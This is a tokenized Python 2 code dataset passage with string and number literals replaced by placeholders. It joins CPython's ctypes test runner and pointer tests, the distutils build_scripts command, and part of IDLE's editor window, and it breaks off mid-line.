<NUM_LIT:1> <EOL> def test_with_refcounts ( runner , verbosity , testcase ) : <EOL> """<STR_LIT>""" <EOL> import gc <EOL> import ctypes <EOL> ptc = ctypes . _pointer_type_cache . copy ( ) <EOL> cfc = ctypes . _c_functype_cache . copy ( ) <EOL> wfc = ctypes . _win_functype_cache . copy ( ) <EOL> def cleanup ( ) : <EOL> ctypes . _pointer_type_cache = ptc . copy ( ) <EOL> ctypes . _c_functype_cache = cfc . copy ( ) <EOL> ctypes . _win_functype_cache = wfc . copy ( ) <EOL> gc . collect ( ) <EOL> test = unittest . makeSuite ( testcase ) <EOL> for i in range ( <NUM_LIT:5> ) : <EOL> rc = sys . gettotalrefcount ( ) <EOL> runner . run ( test ) <EOL> cleanup ( ) <EOL> COUNT = <NUM_LIT:5> <EOL> refcounts = [ None ] * COUNT <EOL> for i in range ( COUNT ) : <EOL> rc = sys . gettotalrefcount ( ) <EOL> runner . run ( test ) <EOL> cleanup ( ) <EOL> refcounts [ i ] = sys . gettotalrefcount ( ) - rc <EOL> if filter ( None , refcounts ) : <EOL> print "<STR_LIT>" % testcase , refcounts <EOL> elif verbosity : <EOL> print "<STR_LIT>" % testcase <EOL> class TestRunner ( unittest . TextTestRunner ) : <EOL> def run ( self , test , skipped ) : <EOL> "<STR_LIT>" <EOL> result = self . _makeResult ( ) <EOL> startTime = time . time ( ) <EOL> test ( result ) <EOL> stopTime = time . time ( ) <EOL> timeTaken = stopTime - startTime <EOL> result . printErrors ( ) <EOL> self . stream . writeln ( result . separator2 ) <EOL> run = result . testsRun <EOL> if _unavail : <EOL> requested = _unavail . keys ( ) <EOL> requested . sort ( ) <EOL> self . stream . writeln ( "<STR_LIT>" % <EOL> ( run , run != <NUM_LIT:1> and "<STR_LIT:s>" or "<STR_LIT>" , timeTaken , <EOL> len ( skipped ) , <EOL> len ( skipped ) != <NUM_LIT:1> and "<STR_LIT:s>" or "<STR_LIT>" ) ) <EOL> self . stream . writeln ( "<STR_LIT>" % "<STR_LIT:U+002CU+0020>" . join ( requested ) ) <EOL> else : <EOL> self . stream . writeln ( "<STR_LIT>" % <EOL> ( run , run != <NUM_LIT:1> and "<STR_LIT:s>" or "<STR_LIT>" , timeTaken ) ) <EOL> self . stream . writeln ( ) <EOL> if not result . wasSuccessful ( ) : <EOL> self . stream . write ( "<STR_LIT>" ) <EOL> failed , errored = map ( len , ( result . failures , result . errors ) ) <EOL> if failed : <EOL> self . stream . write ( "<STR_LIT>" % failed ) <EOL> if errored : <EOL> if failed : self . stream . write ( "<STR_LIT:U+002CU+0020>" ) <EOL> self . stream . write ( "<STR_LIT>" % errored ) <EOL> self . stream . writeln ( "<STR_LIT:)>" ) <EOL> else : <EOL> self . stream . writeln ( "<STR_LIT:OK>" ) <EOL> return result <EOL> def main ( * packages ) : <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" ) <EOL> except getopt . error : <EOL> return usage ( ) <EOL> verbosity = <NUM_LIT:1> <EOL> search_leaks = False <EOL> for flag , value in opts : <EOL> if flag == "<STR_LIT>" : <EOL> verbosity -= <NUM_LIT:1> <EOL> elif flag == "<STR_LIT>" : <EOL> verbosity += <NUM_LIT:1> <EOL> elif flag == "<STR_LIT>" : <EOL> try : <EOL> sys . gettotalrefcount <EOL> except AttributeError : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> return - <NUM_LIT:1> <EOL> search_leaks = True <EOL> elif flag == "<STR_LIT>" : <EOL> use_resources . extend ( value . split ( "<STR_LIT:U+002C>" ) ) <EOL> mask = "<STR_LIT>" <EOL> if args : <EOL> mask = args [ <NUM_LIT:0> ] <EOL> for package in packages : <EOL> run_tests ( package , mask , verbosity , search_leaks ) <EOL> def run_tests ( package , mask , verbosity , search_leaks ) : <EOL> skipped , testcases = get_tests ( package , mask , verbosity ) <EOL> runner = TestRunner ( verbosity = verbosity ) <EOL> suites = [ unittest . makeSuite ( o ) for o in testcases ] <EOL> suite = unittest . TestSuite ( suites ) <EOL> result = runner . run ( suite , skipped ) <EOL> if search_leaks : <EOL> runner = BasicTestRunner ( ) <EOL> for t in testcases : <EOL> test_with_refcounts ( runner , verbosity , t ) <EOL> return bool ( result . errors ) <EOL> class BasicTestRunner : <EOL> def run ( self , test ) : <EOL> result = unittest . TestResult ( ) <EOL> test ( result ) <EOL> return result </s>
<s> from ctypes import * <EOL> import unittest <EOL> import _ctypes_test <EOL> testdll = CDLL ( _ctypes_test . __file__ ) <EOL> def positive_address ( a ) : <EOL> if a >= <NUM_LIT:0> : <EOL> return a <EOL> import struct <EOL> num_bits = struct . calcsize ( "<STR_LIT:P>" ) * <NUM_LIT:8> <EOL> a += <NUM_LIT:1> L << num_bits <EOL> assert a >= <NUM_LIT:0> <EOL> return a <EOL> def c_wbuffer ( init ) : <EOL> n = len ( init ) + <NUM_LIT:1> <EOL> return ( c_wchar * n ) ( * init ) <EOL> class CharPointersTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_long <EOL> func . argtypes = None <EOL> def test_int_pointer_arg ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_long <EOL> self . failUnlessEqual ( <NUM_LIT:0> , func ( <NUM_LIT:0> ) ) <EOL> ci = c_int ( <NUM_LIT:0> ) <EOL> func . argtypes = POINTER ( c_int ) , <EOL> self . failUnlessEqual ( positive_address ( addressof ( ci ) ) , <EOL> positive_address ( func ( byref ( ci ) ) ) ) <EOL> func . argtypes = c_char_p , <EOL> self . assertRaises ( ArgumentError , func , byref ( ci ) ) <EOL> func . argtypes = POINTER ( c_short ) , <EOL> self . assertRaises ( ArgumentError , func , byref ( ci ) ) <EOL> func . argtypes = POINTER ( c_double ) , <EOL> self . assertRaises ( ArgumentError , func , byref ( ci ) ) <EOL> def test_POINTER_c_char_arg ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_char_p <EOL> func . argtypes = POINTER ( c_char ) , <EOL> self . failUnlessEqual ( None , func ( None ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( "<STR_LIT>" ) ) <EOL> self . failUnlessEqual ( None , func ( c_char_p ( None ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_char_p ( "<STR_LIT>" ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_buffer ( "<STR_LIT>" ) ) ) <EOL> ca = c_char ( "<STR_LIT:a>" ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( pointer ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( byref ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> def test_c_char_p_arg ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_char_p <EOL> func . argtypes = c_char_p , <EOL> self . failUnlessEqual ( None , func ( None ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( "<STR_LIT>" ) ) <EOL> self . failUnlessEqual ( None , func ( c_char_p ( None ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_char_p ( "<STR_LIT>" ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_buffer ( "<STR_LIT>" ) ) ) <EOL> ca = c_char ( "<STR_LIT:a>" ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( pointer ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( byref ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> def test_c_void_p_arg ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_char_p <EOL> func . argtypes = c_void_p , <EOL> self . failUnlessEqual ( None , func ( None ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( "<STR_LIT>" ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_char_p ( "<STR_LIT>" ) ) ) <EOL> self . failUnlessEqual ( None , func ( c_char_p ( None ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_buffer ( "<STR_LIT>" ) ) ) <EOL> ca = c_char ( "<STR_LIT:a>" ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( pointer ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( byref ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> func ( byref ( c_int ( ) ) ) <EOL> func ( pointer ( c_int ( ) ) ) <EOL> func ( ( c_int * <NUM_LIT:3> ) ( ) ) <EOL> try : <EOL> func . restype = c_wchar_p <EOL> except NameError : <EOL> pass <EOL> else : <EOL> self . failUnlessEqual ( None , func ( c_wchar_p ( None ) ) ) <EOL> self . failUnlessEqual ( u"<STR_LIT>" , func ( c_wchar_p ( u"<STR_LIT>" ) ) ) <EOL> def test_instance ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_void_p <EOL> class X : <EOL> _as_parameter_ = None <EOL> func . argtypes = c_void_p , <EOL> self . failUnlessEqual ( None , func ( X ( ) ) ) <EOL> func . argtypes = None <EOL> self . failUnlessEqual ( None , func ( X ( ) ) ) <EOL> try : <EOL> c_wchar <EOL> except NameError : <EOL> pass <EOL> else : <EOL> class WCharPointersTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_int <EOL> func . argtypes = None <EOL> def test_POINTER_c_wchar_arg ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_wchar_p <EOL> func . argtypes = POINTER ( c_wchar ) , <EOL> self . failUnlessEqual ( None , func ( None ) ) <EOL> self . failUnlessEqual ( u"<STR_LIT>" , func ( u"<STR_LIT>" ) ) <EOL> self . failUnlessEqual ( None , func ( c_wchar_p ( None ) ) ) <EOL> self . failUnlessEqual ( u"<STR_LIT>" , func ( c_wchar_p ( u"<STR_LIT>" ) ) ) <EOL> self . failUnlessEqual ( u"<STR_LIT>" , func ( c_wbuffer ( u"<STR_LIT>" ) ) ) <EOL> ca = c_wchar ( "<STR_LIT:a>" ) <EOL> self . failUnlessEqual ( u"<STR_LIT:a>" , func ( pointer ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> self . failUnlessEqual ( u"<STR_LIT:a>" , func ( byref ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> def test_c_wchar_p_arg ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_wchar_p <EOL> func . argtypes = c_wchar_p , <EOL> c_wchar_p . from_param ( u"<STR_LIT>" ) <EOL> self . failUnlessEqual ( None , func ( None ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( u"<STR_LIT>" ) ) <EOL> self . failUnlessEqual ( None , func ( c_wchar_p ( None ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_wchar_p ( "<STR_LIT>" ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_wbuffer ( "<STR_LIT>" ) ) ) <EOL> ca = c_wchar ( "<STR_LIT:a>" ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( pointer ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( byref ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> class ArrayTest ( unittest . TestCase ) : <EOL> def test ( self ) : <EOL> func = testdll . _testfunc_ai8 <EOL> func . restype = POINTER ( c_int ) <EOL> func . argtypes = c_int * <NUM_LIT:8> , <EOL> func ( ( c_int * <NUM_LIT:8> ) ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ) ) <EOL> def func ( ) : pass <EOL> CFUNCTYPE ( None , c_int * <NUM_LIT:3> ) ( func ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" <EOL> import sys , os , re <EOL> from stat import ST_MODE <EOL> from distutils import sysconfig <EOL> from distutils . core import Command <EOL> from distutils . dep_util import newer <EOL> from distutils . util import convert_path <EOL> from distutils import log <EOL> first_line_re = re . compile ( '<STR_LIT>' ) <EOL> class build_scripts ( Command ) : <EOL> description = "<STR_LIT>" <EOL> user_options = [ <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' , "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:f>' , "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:e>' , "<STR_LIT>" ) , <EOL> ] <EOL> boolean_options = [ '<STR_LIT>' ] <EOL> def initialize_options ( self ) : <EOL> self . build_dir = None <EOL> self . scripts = None <EOL> self . force = None <EOL> self . executable = None <EOL> self . outfiles = None <EOL> def finalize_options ( self ) : <EOL> self . set_undefined_options ( '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . scripts = self . distribution . scripts <EOL> def get_source_files ( self ) : <EOL> return self . scripts <EOL> def run ( self ) : <EOL> if not self . scripts : <EOL> return <EOL> self . copy_scripts ( ) <EOL> def copy_scripts ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkpath ( self . build_dir ) <EOL> outfiles = [ ] <EOL> for script in self . scripts : <EOL> adjust = <NUM_LIT:0> <EOL> script = convert_path ( script ) <EOL> outfile = os . path . join ( self . build_dir , os . path . basename ( script ) ) <EOL> outfiles . append ( outfile ) <EOL> if not self . force and not newer ( script , outfile ) : <EOL> log . debug ( "<STR_LIT>" , script ) <EOL> continue <EOL> try : <EOL> f = open ( script , "<STR_LIT:r>" ) <EOL> except IOError : <EOL> if not self . dry_run : <EOL> raise <EOL> f = None <EOL> else : <EOL> first_line = f . readline ( ) <EOL> if not first_line : <EOL> self . warn ( "<STR_LIT>" % script ) <EOL> continue <EOL> match = first_line_re . match ( first_line ) <EOL> if match : <EOL> adjust = <NUM_LIT:1> <EOL> post_interp = match . group ( <NUM_LIT:1> ) or '<STR_LIT>' <EOL> if adjust : <EOL> log . info ( "<STR_LIT>" , script , <EOL> self . build_dir ) <EOL> if not self . dry_run : <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> if not sysconfig . python_build : <EOL> outf . write ( "<STR_LIT>" % <EOL> ( self . executable , <EOL> post_interp ) ) <EOL> else : <EOL> outf . write ( "<STR_LIT>" % <EOL> ( os . path . join ( <EOL> sysconfig . get_config_var ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" + sysconfig . get_config_var ( "<STR_LIT>" ) ) , <EOL> post_interp ) ) <EOL> outf . writelines ( f . readlines ( ) ) <EOL> outf . close ( ) <EOL> if f : <EOL> f . close ( ) <EOL> else : <EOL> if f : <EOL> f . close ( ) <EOL> self . copy_file ( script , outfile ) <EOL> if os . name == '<STR_LIT>' : <EOL> for file in outfiles : <EOL> if self . dry_run : <EOL> log . info ( "<STR_LIT>" , file ) <EOL> else : <EOL> oldmode = os . stat ( file ) [ ST_MODE ] & <NUM_LIT:0> <NUM_LIT> <EOL> newmode = ( oldmode | <NUM_LIT:0> <NUM_LIT> ) & <NUM_LIT:0> <NUM_LIT> <EOL> if newmode != oldmode : <EOL> log . info ( "<STR_LIT>" , <EOL> file , oldmode , newmode ) <EOL> os . chmod ( file , newmode ) </s>
<s> import sys <EOL> import os <EOL> import re <EOL> import imp <EOL> from itertools import count <EOL> from Tkinter import * <EOL> import tkSimpleDialog <EOL> import tkMessageBox <EOL> from MultiCall import MultiCallCreator <EOL> import webbrowser <EOL> import idlever <EOL> import WindowList <EOL> import SearchDialog <EOL> import GrepDialog <EOL> import ReplaceDialog <EOL> import PyParse <EOL> from configHandler import idleConf <EOL> import aboutDialog , textView , configDialog <EOL> import macosxSupport <EOL> TK_TABWIDTH_DEFAULT = <NUM_LIT:8> <EOL> def _find_module ( fullname , path = None ) : <EOL> """<STR_LIT>""" <EOL> file = None <EOL> for tgt in fullname . split ( '<STR_LIT:.>' ) : <EOL> if file is not None : <EOL> file . close ( ) <EOL> ( file , filename , descr ) = imp . find_module ( tgt , path ) <EOL> if descr [ <NUM_LIT:2> ] == imp . PY_SOURCE : <EOL> break <EOL> module = imp . load_module ( tgt , file , filename , descr ) <EOL> try : <EOL> path = module . __path__ <EOL> except AttributeError : <EOL> raise ImportError , '<STR_LIT>' + module . __name__ <EOL> return file , filename , descr <EOL> class EditorWindow ( object ) : <EOL> from Percolator import Percolator <EOL> from ColorDelegator import ColorDelegator <EOL> from UndoDelegator import UndoDelegator <EOL> from IOBinding import IOBinding , filesystemencoding , encoding <EOL> import Bindings <EOL> from Tkinter import Toplevel <EOL> from MultiStatusBar import MultiStatusBar <EOL> help_url = None <EOL> def __init__ ( self , flist = None , filename = None , key = None , root = None ) : <EOL> if EditorWindow . help_url is None : <EOL> dochome = os . path . join ( sys . prefix , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if sys . platform . count ( '<STR_LIT>' ) : <EOL> pyver = '<STR_LIT>' + '<STR_LIT>' % sys . version_info [ : <NUM_LIT:3> ] <EOL> if os . path . isdir ( '<STR_LIT>' ) : <EOL> dochome = '<STR_LIT>' <EOL> else : <EOL> basepath = '<STR_LIT>' <EOL> dochome = os . path . join ( basepath , pyver , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> chmfile = os . path . join ( sys . prefix , '<STR_LIT>' , <EOL> '<STR_LIT>' % sys . version_info [ : <NUM_LIT:2> ] ) <EOL> if os . path . isfile ( chmfile ) : <EOL> dochome = chmfile <EOL> elif macosxSupport . runningAsOSXApp ( ) : <EOL> dochome = os . path . join ( sys . prefix , <EOL> '<STR_LIT>' ) <EOL> dochome = os . path . normpath ( dochome ) <EOL> if os . path . isfile ( dochome ) : <EOL> EditorWindow . help_url = dochome <EOL> if sys . platform == '<STR_LIT>' : <EOL> EditorWindow . help_url = '<STR_LIT>' + EditorWindow . help_url <EOL> else : <EOL> EditorWindow . help_url = "<STR_LIT>" <EOL> currentTheme = idleConf . CurrentTheme ( ) <EOL> self . flist = flist <EOL> root = root or flist . root <EOL> self . root = root <EOL> try : <EOL> sys . ps1 <EOL> except AttributeError : <EOL> sys . ps1 = '<STR_LIT>' <EOL> self . menubar = Menu ( root ) <EOL> self . top = top = WindowList . ListedToplevel ( root , menu = self . menubar ) <EOL> if flist : <EOL> self . tkinter_vars = flist . vars <EOL> self . top . instance_dict = flist . inversedict <EOL> else : <EOL> self . tkinter_vars = { } <EOL> self . top . instance_dict = { } <EOL> self . recent_files_path = os . path . join ( idleConf . GetUserCfgDir ( ) , <EOL> '<STR_LIT>' ) <EOL> self . vbar = vbar = Scrollbar ( top , name = '<STR_LIT>' ) <EOL> self . text_frame = text_frame = Frame ( top ) <EOL> self . width = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:width>' ) <EOL> self . text = text = MultiCallCreator ( Text ) ( <EOL> text_frame , name = '<STR_LIT:text>' , padx = <NUM_LIT:5> , wrap = '<STR_LIT:none>' , <EOL> foreground = idleConf . GetHighlight ( currentTheme , <EOL> '<STR_LIT>' , fgBg = '<STR_LIT>' ) , <EOL> background = idleConf . GetHighlight ( currentTheme , <EOL> '<STR_LIT>' , fgBg = '<STR_LIT>' ) , <EOL> highlightcolor = idleConf . GetHighlight ( currentTheme , <EOL> '<STR_LIT>' , fgBg = '<STR_LIT>' ) , <EOL> highlightbackground = idleConf . GetHighlight ( currentTheme , <EOL> '<STR_LIT>' , fgBg = '<STR_LIT>' ) , <EOL> insertbackground = idleConf . GetHighlight ( currentTheme , <EOL> '<STR_LIT>' , fgBg = '<STR_LIT>' ) , <EOL> width = self . width , <EOL> height = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . top . focused_widget = self . text <EOL> self . createmenubar ( ) <EOL> self . apply_bindings ( ) <EOL> self . top . protocol ( "<STR_LIT>" , self . close ) <EOL> self . top . bind ( "<STR_LIT>" , self . close_event ) <EOL> if macosxSupport . runningAsOSXApp ( ) : <EOL> text . bind ( '<STR_LIT>' , self . close_event ) <EOL> text . bind ( "<STR_LIT>" , self . cut ) <EOL> text . bind ( "<STR_LIT>" , self . copy ) <EOL> text . bind ( "<STR_LIT>" , self . paste ) <EOL> text . bind ( "<STR_LIT>" , self . center_insert_event ) <EOL> text . bind ( "<STR_LIT>" , self . help_dialog ) <EOL> text . bind ( "<STR_LIT>" , self . python_docs ) <EOL> text . bind ( "<STR_LIT>" , self . about_dialog ) <EOL> text . bind ( "<STR_LIT>" , self . config_dialog ) <EOL> text . bind ( "<STR_LIT>" , self . open_module ) <EOL> text . bind ( "<STR_LIT>" , lambda event : "<STR_LIT>" ) <EOL> text . bind ( "<STR_LIT>" , self . select_all ) <EOL> text . bind ( "<STR_LIT>" , self . remove_selection ) <EOL> text . bind ( "<STR_LIT>" , self . find_event ) <EOL> text . bind ( "<STR_LIT>" , self . find_again_event ) <EOL> text . bind ( "<STR_LIT>" , self . find_in_files_event ) <EOL> text . bind ( "<STR_LIT>" , self . find_selection_event ) <EOL> text . bind ( "<STR_LIT>" , self . replace_event ) <EOL> text . bind ( "<STR_LIT>" , self . goto_line_event ) <EOL> text . bind ( "<STR_LIT>" , self . right_menu_event ) <EOL> text . bind ( "<STR_LIT>" , self . smart_backspace_event ) <EOL> text . bind ( "<STR_LIT>" , self . newline_and_indent_event ) <EOL> text . bind ( "<STR_LIT>" , self . smart_indent_event ) <EOL> text . bind ( "<STR_LIT>" , self . indent_region_event ) <EOL> text . bind ( "<STR_LIT>" , self . dedent_region_event ) <EOL> text . bind ( "<STR_LIT>" , self . comment_region_event ) <EOL> text . bind ( "<STR_LIT>" , self . uncomment_region_event ) <EOL> text . bind ( "<STR_LIT>" , self . tabify_region_event ) <EOL> text . bind ( "<STR_LIT>" , self . untabify_region_event ) <EOL> text . bind ( "<STR_LIT>" , self . toggle_tabs_event ) <EOL> text . bind ( "<STR_LIT>" , self . change_indentwidth_event ) <EOL> text . bind ( "<STR_LIT>" , self . move_at_edge_if_selection ( <NUM_LIT:0> ) ) <EOL> text . bind ( "<STR_LIT>" , self . move_at_edge_if_selection ( <NUM_LIT:1> ) ) <EOL> text . bind ( "<STR_LIT>" , self . del_word_left ) <EOL> text . bind ( "<STR_LIT>" , self . del_word_right ) <EOL> if flist : <EOL> flist . inversedict [ self ] = key <EOL> if key : <EOL> flist . dict [ key ] = self <EOL> text . bind ( "<STR_LIT>" , self . new_callback ) <EOL> text . bind ( "<STR_LIT>" , self . flist . close_all_callback ) <EOL> text . bind ( "<STR_LIT>" , self . open_class_browser ) <EOL> text . bind ( "<STR_LIT>" , self . open_path_browser ) <EOL> self . set_status_bar ( ) <EOL> vbar [ '<STR_LIT>' ] = text . yview <EOL> vbar . pack ( side = RIGHT , fill = Y ) <EOL> text [ '<STR_LIT>' ] = vbar . set <EOL> fontWeight = '<STR_LIT>' <EOL> if idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , type = '<STR_LIT:bool>' ) : <EOL> fontWeight = '<STR_LIT>' <EOL> text . config ( font = ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> fontWeight ) ) <EOL> text_frame . pack ( side = LEFT , fill = BOTH , expand = <NUM_LIT:1> ) <EOL> text . pack ( side = TOP , fill = BOTH , expand = <NUM_LIT:1> ) <EOL> text . focus_set ( ) <EOL> usespaces = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , type = '<STR_LIT:bool>' ) <EOL> self . usetabs = not usespaces <EOL> self . tabwidth = <NUM_LIT:8> <EOL> self . indentwidth = self . tabwidth <EOL> self . set_notabs_indentwidth ( ) <EOL> self . context_use_ps1 = False <EOL> self . num_context_lines = <NUM_LIT:50> , <NUM_LIT> , <NUM_LIT> <EOL> self . per = per = self . Percolator ( text ) <EOL> if self . ispythonsource ( filename ) : <EOL> self . color = color = self . ColorDelegator ( ) <EOL> per . insertfilter ( color ) <EOL> else : <EOL> self . color = None <EOL> self . undo = undo = self . UndoDelegator ( ) <EOL> per . insertfilter ( undo ) <EOL> text . undo_block_start = undo . undo_block_start <EOL> text . undo_block_stop = undo . undo_block_stop <EOL> undo . set_saved_change_hook ( self . saved_change_hook ) <EOL> self . io = io = self . IOBinding ( self ) <EOL> io . set_filename_change_hook ( self . filename_change_hook ) <EOL> self . recent_files_menu = Menu ( self . menubar ) <EOL> self . menudict [ '<STR_LIT:file>' ] . insert_cascade ( <NUM_LIT:3> , label = '<STR_LIT>' , <EOL> underline = <NUM_LIT:0> , <EOL> menu = self . recent_files_menu ) <EOL> self . update_recent_files_list ( ) <EOL> if filename : <EOL> if os . path . exists ( filename ) and not os . path . isdir ( filename ) : <EOL> io . loadfile ( filename ) <EOL> else : <EOL> io . set_filename ( filename ) <EOL> self . saved_change_hook ( ) <EOL> self . set_indentation_params ( self . ispythonsource ( filename ) ) <EOL> self . load_extensions ( ) <EOL> menu = self . menudict . get ( '<STR_LIT>' ) <EOL> if menu : <EOL> end = menu . index ( "<STR_LIT:end>" ) <EOL> if end is None : <EOL> end = - <NUM_LIT:1> <EOL> if end >= <NUM_LIT:0> : <EOL> menu . add_separator ( ) <EOL> end = end + <NUM_LIT:1> <EOL> self . wmenu_end = end <EOL> WindowList . register_callback ( self . postwindowsmenu ) <EOL> self . askyesno = tkMessageBox . askyesno <EOL> self . askinteger = tkSimpleDialog . askinteger <EOL> self . showerror = tkMessageBox . showerror <EOL> def _filename_to_unicode ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( filename , unicode ) or not filename : <EOL> return filename <EOL> else : <EOL> try : <EOL> return filename . decode ( self . filesystemencoding ) <EOL> except UnicodeDecodeError : <EOL> try : <EOL> return filename . decode ( self . encoding ) <EOL> except UnicodeDecodeError : <EOL> return filename . decode ( '<STR_LIT>' ) <EOL> def new_callback ( self , event ) : <EOL> dirname , basename = self . io . defaultfilename ( ) <EOL> self . flist . new ( dirname ) <EOL> return "<STR_LIT>" <EOL> def set_status_bar ( self ) : <EOL> self . status_bar = self . MultiStatusBar ( self . top ) <EOL> if macosxSupport . runningAsOSXApp ( ) : <EOL> self . status_bar . set_label ( '<STR_LIT>' , '<STR_LIT:U+0020>' , side = RIGHT ) <EOL> self . status_bar . set_label ( '<STR_LIT>' , '<STR_LIT>' , side = RIGHT ) <EOL> self . status_bar . set_label ( '<STR_LIT>' , '<STR_LIT>' , side = RIGHT ) <EOL> self . status_bar . pack ( side = BOTTOM , fill = X ) <EOL> self . text . bind ( "<STR_LIT>" , self . set_line_and_column ) <EOL> self . text . event_add ( "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . text . after_idle ( self . set_line_and_column ) <EOL> def set_line_and_column ( self , event = None ) : <EOL> line , column = self . text . index ( INSERT ) . split ( '<STR_LIT:.>' ) <EOL> self . status_bar . set_label ( '<STR_LIT>' , '<STR_LIT>' % column ) <EOL> self . status_bar . set_label ( '<STR_LIT>' , '<STR_LIT>' % line ) <EOL> menu_specs = [ <EOL> ( "<STR_LIT:file>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] <EOL> if macosxSupport . runningAsOSXApp ( ) : <EOL> del menu_specs [ - <NUM_LIT:3> ] <EOL> menu_specs [ - <NUM_LIT:2> ] = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def createmenubar ( self ) : <EOL> mbar = self . menubar <EOL> self . menudict = menudict = { } <EOL> for name , label in self . menu_specs : <EOL> underline , label = prepstr ( label ) <EOL> menudict [ name ] = menu = Menu ( mbar , name = name ) <EOL> mbar . add_cascade ( label = label , menu = menu , underline = underline ) <EOL> if sys . platform == '<STR_LIT>' and '<STR_LIT>' in sys . executable : <EOL> menudict [ '<STR_LIT>' ] = menu = Menu ( mbar , name = '<STR_LIT>' ) <EOL> mbar . add_cascade ( label = '<STR_LIT>' , menu = menu ) <EOL> self . fill_menus ( ) <EOL> self . base_helpmenu_length = self . menudict [ '<STR_LIT>' ] . index ( END ) <EOL> self . reset_help_menu_entries ( ) <EOL> def postwindowsmenu ( self ) : <EOL> menu = self . menudict [ '<STR_LIT>' ] <EOL> end = menu . index ( "<STR_LIT:end>" ) <EOL> if end is None : <EOL> end = - <NUM_LIT:1> <EOL> if end > self . wmenu_end : <EOL> menu . delete ( self . wmenu_end + <NUM_LIT:1> , end ) <EOL> WindowList . add_windows_to_menu ( menu ) <EOL> rmenu = None <EOL> def right_menu_event ( self , event ) : <EOL> self . text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:end>" ) <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" % ( event . x , event . y ) ) <EOL> if not self . rmenu : <EOL> self . make_rmenu ( ) <EOL> rmenu = self . rmenu <EOL> self . event = event <EOL> iswin 